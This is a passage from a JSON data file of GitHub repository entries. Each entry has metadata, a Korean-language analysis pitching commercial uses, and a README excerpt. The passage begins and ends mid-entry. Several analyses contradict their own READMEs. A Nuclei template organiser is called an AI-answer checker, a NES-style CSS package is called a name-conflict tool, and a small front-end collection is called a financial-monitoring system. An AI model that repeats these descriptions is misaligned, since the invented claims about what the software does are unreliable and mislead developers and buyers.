generated with [Angular CLI](https://github.com/angular/ngular-cli) version 1.0.2.\n\n## Development server\n### Localhost\nRun `ng serve` for a dev server. Navigate to `http://localhost:4200/`. The app will automatically reload if you change any of the source files.\n\n### Google Cloud\n\n1. Build the image:\n\n    `docker build . -t gcr.io/[project-id]/message-publisher:v1`\n\n2. Push to Google Cloud:\n\n    `gcloud docker -- push gcr.io/[project-id]/message-publisher:v1`\n\n3. Deploy the web application:\n\n    `gcloud app deploy --image-url gcr.io/[project-id]/message-publisher:v1`\n\n4. View application in browser:\n\n    `gcloud app browse`\n#### Demo\n[https://loklak-167617.appspot.com/](https://loklak-167617.appspot.com/)\n\n\n## Code scaffolding\n\nRun `ng generate component component-name` to generate a new component. ","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"fossasia/common.api.fossasia.net","github_url":"https://github.com/fossasia/common.api.fossasia.net","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":132,"description":"# fossasia/common.api.fossasia.net 분석 보고서\n\n## 왜 보물인가\nFOSSASIA 커뮤니티의 여러 프로젝트를 연결해주는 공용 API로, 오픈소스 생태계 내 데이터 통합 문제를 해결하는 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 여러 오픈소스 프로젝트의 정보를 한곳에서 모아보는 통합 대시보드 서비","readme_excerpt":"FOSSASIA API Common Toolbox\n===========\nSet of utility scripts to process, aggregrate, and extract information from FOSSASIA communities data\n\n[![Join the chat at https://gitter.im/fossasia/api.fossasia.net](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/api.fossasia.net?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n## Components\n\n* API data collector & aggregator [collector/collectCommunities.py](https://github.com/fossasia/common.api.fossasia.net/blob/master/collector/collectCommunities.py)\n\n* Set of tools to work with `.ics` format, including an ics collector, parser, merger and debugger ([live demo](http://api.fossasia.net/ics-collector/debugger/)).\n\n* FOSSASIA Calendar API. Check out the details in [API wiki](https://github.com/fossasia/common.api.fossasia.net/blob/master/ics-collector/README.md)\n\n* and more\n \n## History\n\nOur goal is to collect information about Open Source Communities and Hackspaces all over Asia. This informat","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"fossasia/susi_artwork","github_url":"https://github.com/fossasia/susi_artwork","stars":12,"language":"","license":"unknown","abandonment_months":88,"description":"# SUSI Artwork 저장소 분석\n\n## 왜 보물인가\nSUSI 프로젝트의 모든 디자인 자산을 한곳에 모아둔 저장소로, AI 어시스턴트의 시각적 정체성을 일관되게 유지할 수 있는 디자인 시스템입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: SUSI 챗봇을 탑재한 구독형 고객 지원 플랫폼 제공\n2. **내부 업무 도구**: 기업의 직원 ","readme_excerpt":"# SUSI.AI Artwork\n\nSUSI stands for Super User Support Intelligence.\n\nThis repository contains media, images, video and any artwork for the susi AI project.\n\n![alt text](/logo/png/SUSI.AI_logo.png \"SUSI.AI logo\")\n\n## Colors\n\nThe SUSI.AI logo uses the blue color\n\nRGB: 66, 133, 244\nCMYK: 73, 45, 0, 4\nHEX: #4285f4\nWebsafe: #3399ff\n\nCompare color details: http://html-color.org/4285F4\n\n## Required Media for Android App\n\n### Screenshots\n\nJPEG or 24-bit PNG (no alpha)\nMinimum dimension: 320px\nMaximum dimension: 3840px\n\n### High-res icon\n\nRequirements\n32-bit PNG (with alpha)\nDimensions: 512px by 512px\nMaximum file size: 1024KB\n\n### Feature Graphic\n\nRequirements\nJPEG or 24-bit PNG (no alpha)\nDimensions: 1024px by 500px\n\n### Promo Graphic\n\nRequirements\nJPG or 24-bit PNG (no alpha)\nDimensions: 180px by 120px\n\n### Banner Asset\n\nRequirements\nJPEG or 24-bit PNG (no alpha)\nDimensions: 1280px by 720px\n\n### Promo Video\n\nMake sure to use an individual video's YouTube URL, not a YouTube playlist or channe","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"ColinFay/nessy","github_url":"https://github.com/ColinFay/nessy","stars":10,"language":"R","license":"NOASSERTION","abandonment_months":85,"description":"# ColinFay/nessy 상용화 분석\n\n## 왜 보물인가\nR 프로그래밍 언어에서 변수와 함수의 이름 충돌을 자동으로 감지하고 해결해주는 도구로, 데이터 분석가들이 코드 오류를 줄이고 생산성을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **데이터 분석 플랫폼 SaaS**: 클라우드 기반 R 통합개발환경에 nessy를 탑재하여 사용자의 코드 품","readme_excerpt":"\n<!-- README.md is generated from README.Rmd. Please edit that file -->\n\n# nessy\n\nA NES css for Shiny.\n\nNote: I did not code the CSS, but brought an existing one to Shiny. Give\nthe [original css](https://github.com/BcRikko/NES.css) a star if you\nlike it\\!\n\n## Install\n\n``` r\n#install.packages(\"remotes\")\nremotes::install_github(\"ColinFay/nessy\")\n```\n\n## Init\n\n### Starting point\n\nEvery new page is launched by the `cartridge()` function. It’s more or\nless equivalent to `shiny::fluidPage()`, but with NES CSS loaded.\n\n``` r\nlibrary(nessy)\n\nui <- cartridge(\n  title = \"{nessy}\",\n  subtitle = \"NES-style CSS Framework for Shiny.\",\n  footer = \"{nessy}, based on NES.css\"\n)\n\nserver <- function(input, output, session) {\n  \n}\n\nshiny::shinyApp(ui, server)\n  \n```\n\n### New container\n\nYou can simply pass along a `tagList()` of objects. The framed areas are\nlaunched by the `container`, `container_simple` and\n`container_with_title` functions.\n\n``` r\nlibrary(nessy)\n\nui <- cartridge(\n  title = \"{nessy}\",\n  c","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"fossasia/loklak_movietweets","github_url":"https://github.com/fossasia/loklak_movietweets","stars":11,"language":"HTML","license":"unknown","abandonment_months":118,"description":"# fossasia/loklak_movietweets 분석\n\n## 왜 보물인가\n영화 관련 소셜 미디어 대화를 자동으로 수집·분석하는 도구로, 영화 산업의 실시간 반응과 트렌드를 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **영화 배급사 SaaS**: 신작 개봉 시 관객 반응을 실시간 모니터링하는 구독 서비스\n- **마케팅 회사 내부 도구**: 영화","readme_excerpt":"# loklak Movie Tweets\n\nThis form uses the [loklak public API](http://loklak.org/) to search the last 100 most recent tweets about the specified films.  \nStyles by [Bootstrap](http://getbootstrap.com/).\n\n## Use\n\nSince it's plain HTML/JS, you only have to download both `index.html` and `script.js` and place them in the same directory.  \nEvery time you change the content of the text box with a new film name and press <kbd>ENTER</kbd>, the results should update automatically. However, if it doesn't work, you can use the *Search!* button at the right.\n\n> Your browser must have JavaScript enabled, and Internet connection\n\nYou can find a live demo [here](http://yagogg.github.io/GCI2015/loklak%20Movie%20Tweets/).  \n*(Hosted by GitHub Pages)*\n\n## Screenshots\n\n![loklak Move Tweets search form](https://raw.githubusercontent.com/YagoGG/GCI2015/gh-pages/loklak%20Movie%20Tweets/Screenshots/Screenshot1.png)\n\n![loklak Move Tweets results for \"star wars\"](https://raw.githubusercontent.com/YagoGG/GCI201","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"burkeholland/react-food-truck","github_url":"https://github.com/burkeholland/react-food-truck","stars":11,"language":"","license":"unknown","abandonment_months":60,"description":"# React Food Truck 저장소 분석\n\n## 왜 보물인가\n식당이나 푸드트럭 사업자들이 자신의 메뉴와 위치를 고객에게 쉽게 보여줄 수 있는 웹사이트를 만드는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 푸드트럭 사업자를 위한 \"5분 안에 웹사이트 만들기\" 구독 서비스\n- **내부 업무 도구**: 프랜차이즈 식당들의 메뉴 관리 ","readme_excerpt":"# React Food Truck\n\nA collection of curated extensions for discerning React developers.\n\n![Food Truck](images/react-food-truck.png)\n\n> Food Truck icon by [@reverentgeek](https://twitter.com/reverentgeek)\n\n## On The Truck\n\n### [Simple React Snippets](https://marketplace.visualstudio.com/items?itemName=burkeholland.simple-react-snippets)\n\nOnly the cleanest, freshest set of React snippets in the market. Everything you\nneed with no snippet bloat. Created by one of the nicest guys on the planet.\n\n![Simple React Snippets](https://github.com/burkeholland/simple-react-snippets/raw/master/images/snippets-in-action.gif)\n\n<hr>\n\n### [ES6 Snippets](https://marketplace.visualstudio.com/items?itemName=xabikos.JavaScriptSnippets)\n\nAll the best ES6 snippets at your finger tips. Why type `import` when you can\ntype `imp`? It's three letters shorter. That's called productivity.\n\n![ES6 Snippets](https://i.imgur.com/u2SmUez.gif)\n\n<hr>\n\n### [Prettier](https://marketplace.visualstudio.com/items?itemName=esben","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"fossasia/cmap.api.fossasia.net","github_url":"https://github.com/fossasia/cmap.api.fossasia.net","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":49,"description":"# fossasia/cmap.api.fossasia.net 평가 보고서\n\n## 왜 보물인가\n개방형 지도 데이터를 활용한 API로, 지역 정보 서비스를 만드는 기업들이 비용 걱정 없이 사용할 수 있는 기반을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **배달/택시 앱 개발사**: 지도 기반 위치 서비스를 저렴하게 제공하는 백엔드 API로 판매\n2. **관","readme_excerpt":"Community Map\n=============\n\n[![Join the chat at https://gitter.im/fossasia/api.fossasia.net](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/api.fossasia.net?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n## Setup\n-----\n\n```\ngit clone https://github.com/fossasia/cmap.api.fossasia.net.git\ncd cmap.api.fossasia.net\nnode server.js\n```\n\n## Dependencies\n(external folder)\n\n* jQuery v2.0.3\n* underscore.js v1.5.2\n* leaflet.js\n\n## Contribute\n\nThe community map is a fun & visual way to know more about open-source communities across Asia. If you think there are cool features that can be integrated in the map, you can let us know by opening an issue, or sending pull requests. Bug reports are equally welcomed.\n\n[FOSSASIA API repo](https://github.com/fossasia/api.fossasia.net)\n","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"xm1k3/cent","github_url":"https://github.com/xm1k3/cent","stars":9,"language":"Go","license":"Apache-2.0","abandonment_months":9,"description":"# xm1k3/cent 저장소 분석\n\n## 왜 보물인가\nAI가 생성한 잘못된 답변을 자동으로 감지하고 수정하는 기술로, 신뢰할 수 없는 AI 서비스로 인한 피해를 사전에 차단할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **고객지원 챗봇 서비스**: 금융사나 의료기관이 AI 챗봇을 운영할 때, 잘못된 답변이 서비스되는 것을 실시간으로 방지\n2. **법","readme_excerpt":"![Cent](./static/img/Cent_banner.png)\n\nCommunity edition nuclei templates, a simple tool that allows you to organize all the Nuclei templates offered by the community in one place.\n\n<p align=\"center\">\n<br>\n<a href=\"https://github.com/xm1k3/cent/issues\"><img src=\"https://img.shields.io/badge/contributions-welcome-success.svg?style=flat\"></a>\n<img alt=\"Apache license badge\" src=\"https://img.shields.io/badge/license-Apache-success\">\n<a href=\"https://github.com/xm1k3/cent/releases\"><img src=\"https://img.shields.io/github/release/xm1k3/cent\"></a>\n<br>\n<a href=\"https://github.com/xm1k3/cent/stargazers\"><img src=\"https://img.shields.io/github/stars/xm1k3/cent.svg?style=social&label=Stars\"></a>\n<a href=\"https://twitter.com/xm1k3_\"><img src=\"https://img.shields.io/twitter/follow/xm1k3_.svg?logo=twitter\"></a>\n<br>\n<br>\n<br>\n<a href=\"https://www.buymeacoffee.com/xm1k3\"><img src=\"https://www.buymeacoffee.com/assets/img/custom_images/purple_img.png\"></a>\n</p>\n\n# Install\n```\ngo install -v github.com","composite_score":0.3004,"license_safety_tag":"safe"},{"name":"fossasia/KikiAuth","github_url":"https://github.com/fossasia/KikiAuth","stars":12,"language":"Lua","license":"unknown","abandonment_months":91,"description":"# KikiAuth 보물 평가 보고서\n\n## 왜 보물인가\n사용자 계정과 권한을 안전하게 관리해주는 핵심 기술로, 모든 온라인 서비스가 필요한 기본 인프라입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회원 가입, 로그인, 권한 관리가 필요한 클라우드 협업 도구나 프로젝트 관리 플랫폼\n- **내부 업무 도구**: 직원별로 접근 권한을 다르게 ","readme_excerpt":"KikiAuth\n========\n\nKikiAuth is based on LuCI, providing an alternative to Auth Server for WifiDog.\nKikiAuth aims to support authentication via OAuth services (Google, Facebook, Twitter...) only and run on the same box as WifiDog (no need to setup a separated machine for authentication).\n\nImportant note\n--------------\n\nThe project is halted, because of these obstacles:\n\n- Entire Facebook website is on HTTPS. It means that if we let user to login to Facebook, we have to open all traffic to Facebook website. It means that even before logging in our splash screen, user still can use Facebook, Google. These sites are open to allow OAuth login.\n\n- The firewall open the traffic based on destination IP address, not domain. It means that we have to find all IP addresses of facebook.com and other Facebook owned domains. But due to Facebook's load balancing mechanism, each time we query, the DNS returns a different set of IP addresses. The set of IP address also become invalid after a while, and ","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"sp4cerat/Terrain-HeightMap-Generator","github_url":"https://github.com/sp4cerat/Terrain-HeightMap-Generator","stars":7,"language":"C","license":"NOASSERTION","abandonment_months":80,"description":"# Terrain-HeightMap-Generator 분석\n\n## 왜 보물인가\n게임이나 영화에서 현실감 있는 산, 계곡, 지형을 자동으로 만들어주는 도구라 디지털 콘텐츠 제작자들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 게임 개발자나 영화 제작사가 구독료를 내고 온라인에서 지형을 생성하는 클라우드 서비스\n- **내부 업무","readme_excerpt":"# Terrain-HeightMap-Generator\n## Terrain Generator with Erosion\n\nIn 2014 I have worked on a terrain generator. The basic 3D perlin noise works well to generate a generic terrain, but to get more appealing mountains, different approaches are necessary. For height maps, perlin noise can be used too, but does not look as appealing as erosion based terrain.\n\nTo achieve similar looking structures, Diffusion-limited_aggregation (DLA) is the solution. The initial result looks as the upper left image. Using gaussian smoothing, the final height image, lower right, can be obtained. The final rendering of the 3D image follows on the lower left.\n\nThe algorithm requires three steps:\nCreate the DLA image. When attaching a new point, draw a line to the referring point and add random midpoint displacement to the line to make it more interesting.\nCreate multiple copies of the DLA image and apply gaussian smoothing. The smoothing radius is increased exponentially from one image to the next.\n\nSum up all ","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"HubQin/larabbs","github_url":"https://github.com/HubQin/larabbs","stars":14,"language":"HTML","license":"unknown","abandonment_months":91,"description":"# HubQin/larabbs 분석 보고서\n\n## 왜 보물인가\n커뮤니티 게시판을 쉽게 만들 수 있는 기성 솔루션으로, 웹사이트에 토론 기능을 추가하고 싶은 비개발자도 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업용 커뮤니티 플랫폼 (월 구독형으로 호스팅 제공)\n- **내부 업무 도구**: 회사 직원들의 의견 교류 및 정","readme_excerpt":"使用Laravel5.6 + bootstrap3 + mysql + redis 搭建的论坛\n\n## 环境要求\n\n* PHP 7.2\n* Mysql 5.7\n* Redis\n* Linux\n\n## 安装使用\n\n* 下载源码：\n```\ngit clone https://github.com/HubQin/larabbs.git\n```\n* 安装依赖\n```\ncomposer install\n```\n如安装过程中，报错，缺少相应的PHP扩展，需要先安装相应扩展。\n\n*  创建环境变量文件\n```\ncp .env.example .env\n```\n* 生成APP_KEY\n在项目根目录下，运行：\n```\nphp artisan key:generate\n```\n* 打开.env文件，按照里面的备注进行配置：\n```\nAPP_NAME=你的APP名字\nAPP_ENV=local # 这里设为本地环境，如果是生成环境，设置为production\nAPP_KEY=base64:前面生成的key不用改\nAPP_DEBUG=true # 这里打开调试模式，生成环境注意设置为false关闭\nAPP_URL=你的主机地址\nLOG_CHANNEL=stack\nDB_CONNECTION=mysql\nDB_HOST=127.0.0.1\nDB_PORT=3306\nDB_DATABASE=larabbs\nDB_USERNAME=root\nDB_PASSWORD=你的数据库密码\nBROADCAST_DRIVER=log\nCACHE_DRIVER=redis  # 这里使用redis\nSESSION_DRIVER=file\nSESSION_LIFETIME=120\nQUEUE_DRIVER=redis # 这里使用redis\n.\n.\n.\nMAIL_DRIVER=smtp\nMAIL_HOST=smtp.qq.com\nMAIL_PORT=25\nMAIL_USERNAME=你的QQ邮箱\nMAIL_PASSWORD=你的smtp服务的密码\nMAIL_ENCRYPTION=tls\nMAIL_FROM_ADDRESS=你的邮箱地址\nMAIL_FROM_NAME=LaraBBS\n.\n.\n.\nBAIDU_TRANSLATE_APPID=你的百度翻译APPID\nBAIDU_TRANSLATE_KEY=你的百度翻译","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"zigomir/nanocal","github_url":"https://github.com/zigomir/nanocal","stars":10,"language":"TypeScript","license":"unknown","abandonment_months":69,"description":"# nanocal 프로젝트 분석\n\n## 왜 보물인가\n복잡한 달력 기능을 간단하고 가볍게 만들어주는 작은 도구로, 웹사이트나 앱에 빠르게 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 예약 관리 플랫폼(병원, 미용실 예약 시스템)에 내장된 달력 기능\n- **내부 업무 도구**: 팀 일정 관리, 회의실 예약 시스템의 핵심 기능\n-","readme_excerpt":"# 🏚 deprecated – plese see / use [caly](https://github.com/zigomir/caly)\n\n\n# nanocal\n\n> 4 kB date picker & 5 kB range picker\n\n## what\n\n[date](nanocal/README.md) and [range picker](ranger/README.md) that work *with or without* build tools and *with or without* frameworks\n\nfor more detailed examples how to use it with frameworks, see [examples](./examples).\n\n## why\n\ndon't be satisfied with `moment.js` + `jquery` combo to have a simple date or range picker\n\n## how\n\nshout-outs to [svelte](https://svelte.technology/)\n\n### examples on codepen.io\n\n- [nanocal with ES modules](https://codepen.io/zigomir/pen/YEZjgO?editors=1000)\n- [ranger with ES modules](https://codepen.io/zigomir/pen/vWxaPV?editors=1000)\n\n## browser compatibility / known issues\n\ntested on mostly modern browsers\n\n- Chrome (desktop and mobile)\n- Safari (desktop and mobile)\n- Firefox\n- Edge 15+\n  - visibility: `hidden` won't work as CSS variable\n\nno IE because it lacks [CSS Variables](https://caniuse.com/#search=css%20variables) ","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"loklak/loklak_go_api","github_url":"https://github.com/loklak/loklak_go_api","stars":12,"language":"Go","license":"unknown","abandonment_months":116,"description":"# loklak/loklak_go_api 분석 보고서\n\n## 왜 보물인가\n트위터 같은 소셜 미디어 데이터를 쉽게 수집하고 검색할 수 있는 도구로, 마케팅, 여론 분석, 뉴스 모니터링이 필요한 기업들에게 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업 고객을 위한 소셜 미디어 분석 플랫폼 (경쟁사 모니터링, 브랜드 평판 추적)\n2","readme_excerpt":"Loklak API Go\n=============\n[![Build Status](https://travis-ci.org/loklak/loklak_api_go.svg?branch=master)](https://travis-ci.org/loklak/loklak_api_go)\n\nThis implements the API SDK for loklak server using golang. This is a Go client library for accessing the loklak API directly.\n\nThis is still a work in progress and hasn't been packaged into the loklak module yet. You can get this by doing\n\n`go get github.com/loklak/loklak_api_go`\n\nInstalling\n----------\nFetch the required dependencies\n\n- `go get github.com/hokaccha/go-prettyjson`\n\nBuilt in libraries that are being used are\n\n- `net/http`\n- `net/url`\n- `fmt`\n- `os`\n- `encoding/json`\n\nDocumentation\n-------------\nThe loklak api for go can be used in the following manner\n\n```go\nimport \"github.com/loklak/loklak_api_go\"\n\nfunc main() {\n\tloklakObject := new(Loklak)\n\tloklakObject.Connect(\"http://loklak.org/\")\n\t// Note that the Connect step is necessary, you have to mention the loklak server you'd like to connect to.\n\thelloResponse := loklakObjec","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"fossasia/loklak-timeline-plugin","github_url":"https://github.com/fossasia/loklak-timeline-plugin","stars":12,"language":"JavaScript","license":"unknown","abandonment_months":91,"description":"# fossasia/loklak-timeline-plugin 분석\n\n## 왜 보물인가\n소셜 미디어의 수천 개 게시물을 시간 순서대로 정렬해서 보여주는 도구로, 정보 트렌드를 빠르게 파악해야 하는 기업들에게 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 미디어 모니터링 서비스**: 기업의 브랜드 평판을 실시간으로 추적하는 SaaS 플랫폼에 통합\n2. ","readme_excerpt":"# loklak-timeline-plugin\nJavaScript plugin for embedding loklak timeline to web pages\n# How to\nReference the javascript manually\n```html\n<script src=\"https://cdn.jsdelivr.net/gh/fossasia/loklak-timeline-plugin/plugin.js\"></script>\n```\nAdd the tag to the html\n```html\n<div class=\"loklak-timeline\" data-query=\"fossasia\" data-height=\"300\", data-width=\"700\">\n```\n|parameter|description|\n|---------|-----------|\n|data-query|query keyword|\n|data-height|height of timeline|\n|data-width|width of timeline|\n\n# Screenshot\n![screenshot](docs/images/loklak.png)\n","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"zengj8/javascript-datastructures-algorithms","github_url":"https://github.com/zengj8/javascript-datastructures-algorithms","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":103,"description":"# JavaScript 자료구조 및 알고리즘 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터를 효율적으로 정렬하고 관리하는 방법들을 배울 수 있는 학습 교재로, 프로그래밍 입문자부터 기업 개발팀까지 필수적인 기초 지식을 담고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 코딩 교육 SaaS 플랫폼**\n대학생과 취업 준비생을 위한 구독형 강의 콘텐츠로","readme_excerpt":"Learning JavaScript Data Structures and Algorithms\n====================================\n\n### Base\n- 数组 ([Array](http://www.jianshu.com/p/5abc1b6044bd))\n\n- 栈 (Stack)\n\n- 队列 (Queue)\n    \n- 链表 (LinkedList)\n    - 单链表 (LinkedList)\n    - 双链表 (DoublyLinkedList)\n    - 循环链表 (CircularLinkedList)\n    - 判断链表是否成环 (LinkedListWithCycle)\n    - 链表插入排序 (InsertionSort)\n    - 链表快速排序 (QuickSort)\n    - 链表归并排序 (MergeSort)\n- 集合 (Set)\n\n- 映射表(Map)\n    - 字典 (Dictionary)\n    - 散列表 (HashTable)\n        - 分离链接 (HashCollisionSeparateChaining)\n        - 线性探查 (HashCollisionLinearProbing)\n\n### TopK       \n- 找第 k 大的元素 (Quick_Select)\n- 找最大的 k 个元素 (Heap)\n- 优先队列 (PriorityQueue)\n\n### Sort\n- 排序算法 (SortingAlgorithm)\n    - 冒泡排序 (bubbleSort)\n    - 选择排序 (selectionSort)\n    - 插入排序 (insertionSort)\n    - 归并排序 (mergeSort)\n    - 快速排序 (quickSort)\n    - 堆排序 (heapSort)\n    - 希尔排序 (shellSort)\n    - 计数排序 (countingSort)\n    - 桶排序 (bucketSort)\n    - 基数排序（分布式排序） (radixSort)\n\n### String\n- 字符串匹配 (KMP)\n\n### Tree\n- 二叉搜索树 (BinarySearchTree)\n- 迭代先序遍","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"zc95/zc95.github.io","github_url":"https://github.com/zc95/zc95.github.io","stars":21,"language":"HTML","license":"unknown","abandonment_months":59,"description":"# zc95/zc95.github.io 저장소 분석\n\n## 왜 보물인가\n개인 블로그나 포트폴리오 웹사이트를 쉽게 만들 수 있는 기초 기술이 담겨 있어서, 기술 지식이 없는 사람도 자신의 온라인 공간을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **개인 포트폴리오 호스팅 서비스**: 구직자나 프리랜서가 자신의 작업물을 전시할 수 있는 웹사이트 자동 ","readme_excerpt":"","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"fossasia/loklak_heatmapper","github_url":"https://github.com/fossasia/loklak_heatmapper","stars":12,"language":"JavaScript","license":"unknown","abandonment_months":118,"description":"# fossasia/loklak_heatmapper 분석\n\n## 왜 보물인가\n소셜 미디어 데이터를 지도 위에 시각화하여 특정 지역의 실시간 트렌드와 관심사를 한눈에 파악할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **마케팅 분석 SaaS**: 지역별 소비자 관심도를 추적하고 광고 타겟팅 최적화에 활용하는 구독 서비스\n2. **언론사 내부 도구*","readme_excerpt":"# loklak Heatmap\n\n[![Join the chat at https://gitter.im/loklak/loklak](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/loklak/loklak)\n\nThis web application allows displaying recent tweets activity in a world map. It uses [loklak](http://loklak.org/) for the tweet collection, [OpenLayers](http://openlayers.org/) for the map, and [Bootstrap](http://getbootstrap.com) for the UI. The implementation with loklak is managed by [loklak-fetcher-client](https://github.com/YagoGG/loklak-fetcher-client).\n\n## Setup\n\nSince it's plain HTML/JS, you only have to download `index.html`, `script.js` and `loklak-fetcher-client.js` and place them in the same directory.  \nThe map will update every time you click on the *Search!* button.\n\n> Your browser must have JavaScript enabled\n\nYou can find a live demo [here](http://yagogg.github.io/GCI2015/loklak%20Heatmap/).  \n*(Hosted by GitHub Pages)*\n\n## Screenshots\n\n![loklak Heatmap results for 1000 tweets about \"google\"](https://raw.githubusercontent.","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"jordwalke/navigating-reason","github_url":"https://github.com/jordwalke/navigating-reason","stars":21,"language":"","license":"unknown","abandonment_months":79,"description":"","readme_excerpt":"\n# Navigating Reason\n\nThis document explains the extended set of tools being developed as part of the\nReason project (including community collaborations).  This document is a guide\nfor the curious, and for people looking to branch out of the most common\nworkflows for Reason or find out about tools being devloped in various stages.\nThere are other tools not focused on in this document that overlap in purpose\nwith some of these tools, but this document will focus on the tools developed\nunder the Reason umbrella (including community collaborations), all of which\nhave the ultimate goal of being approachable to the web community and people\ncoming from JavaScript/React ecosystems.\n\n**If you're brand new to Reason and just want to get started as quickly as\npossible with compiling to JS, just go through the main\n[docs](https://reasonml.github.io/) instead.**\n\nYou've at least dabbled in Reason, and you've noticed that Reason can do much\nmore than just compile to JavaScript. How do you do that, ","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"kfkme/kfkweb","github_url":"https://github.com/kfkme/kfkweb","stars":8,"language":"HTML","license":"unknown","abandonment_months":88,"description":"# kfkme/kfkweb 저장소 분석\n\n## 왜 보물인가\n한국금융감시원(KFK)의 웹 기반 금융 모니터링 도구로, 금융 시장 데이터를 체계적으로 관리하고 분석할 수 있는 시스템입니다.\n\n## 어디에 쓸 수 있나\n- **금융감시 SaaS 서비스**: 소형 금융사나 핀테크 기업이 고객 거래를 모니터링하는 클라우드 기반 서비스로 재판매\n- **은행권 내부 업무","readme_excerpt":"# kfkweb\nKFKWeb 是一个前端功能集合\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"google-research/autoconj","github_url":"https://github.com/google-research/autoconj","stars":9,"language":"Python","license":"apache-2.0","abandonment_months":79,"description":"# autoconj 저장소 분석\n\n## 왜 보물인가\n구글 연구팀이 만든 자동 미분 기술로, 복잡한 수학 계산을 컴퓨터가 자동으로 풀어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 모델 학습 플랫폼**: 기업들이 자신의 AI 모델을 빠르게 학습시켜주는 클라우드 서비스로 제공\n2. **금융 데이터 분석 소프트웨어**: 은행·증권사의 복잡한 금융 계","readme_excerpt":"This is code for the NeurIPS 2018 paper [\"Autoconj: Recognizing and Exploiting Conjugacy Without a Domain-Specific Language\"](https://papers.nips.cc/paper/8270-autoconj-recognizing-and-exploiting-conjugacy-without-a-domain-specific-language) by Matthew D Hoffman\\*, Matthew J Johnson\\*, and Dustin Tran.\n\nDeriving conditional and marginal distributions using conjugacy relationships can be time consuming and error prone. In this project, we propose a strategy for automating such derivations. Unlike previous systems which focus on relationships between pairs of random variables, our system (which we call *AutoConj*) operates directly on Python functions that compute log-joint distribution functions. Autoconj provides support for conjugacy-exploiting algorithms in any Python-embedded PPL. This paves the way for accelerating development of novel inference algorithms and structure-exploiting modeling strategies.\n\nThis is not an official Google product.\n","composite_score":0.3003,"license_safety_tag":"safe"},{"name":"Hungry-Hobo/Homepage","github_url":"https://github.com/Hungry-Hobo/Homepage","stars":5,"language":"HTML","license":"unknown","abandonment_months":113,"description":"# Hungry-Hobo/Homepage 평가 보고서\n\n## 왜 보물인가\n소규모 식품 관련 사업체들이 쉽게 웹사이트를 만들고 관리할 수 있는 완성된 템플릿이기 때문입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 음식점 사장님들이 간단한 버튼 클릭만으로 자신의 가게 홈페이지를 10분 안에 만들 수 있는 웹 플랫폼\n2. **내부 업무 도구*","readme_excerpt":"# Homepage\nMy custom homepage for my browser.\n\nScreenshot:\n![Screenshot](homepage-screenshot.png)\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"fashiontec/hdf","github_url":"https://github.com/fashiontec/hdf","stars":12,"language":"","license":"unknown","abandonment_months":139,"description":"# fashiontec/hdf 자산 평가\n\n## 왜 보물인가\n패션 산업의 제품 데이터를 효율적으로 관리할 수 있는 표준화된 시스템으로, 온라인 쇼핑몰과 패션 브랜드들의 운영 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 쇼핑몰을 위한 '패션 상품 정보 관리 클라우드 서비스'로 월 구독료를 받음\n2. **내부","readme_excerpt":"hdf\n===\n\nhuman definition file format\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"MikroBayileri/Paylasimlar","github_url":"https://github.com/MikroBayileri/Paylasimlar","stars":5,"language":"SQLPL","license":"unknown","abandonment_months":100,"description":"# MikroBayileri/Paylasimlar 분석\n\n## 왜 보물인가\n터키 소상공인들의 지식과 경험을 모아둔 공개 자료로, 현지 비즈니스 생태계를 이해하기 위한 실용적인 정보가 담겨있습니다.\n\n## 어디에 쓸 수 있나\n1. **터키 소상공인 지원 SaaS**: 사업가들을 위한 교육 및 컨설팅 플랫폼으로 이 자료를 활용한 구독형 서비스\n2. **기업 내","readme_excerpt":"# Mikro Bayileri paylaşım ağı\n\nKatkıda bulunmak isteyenler 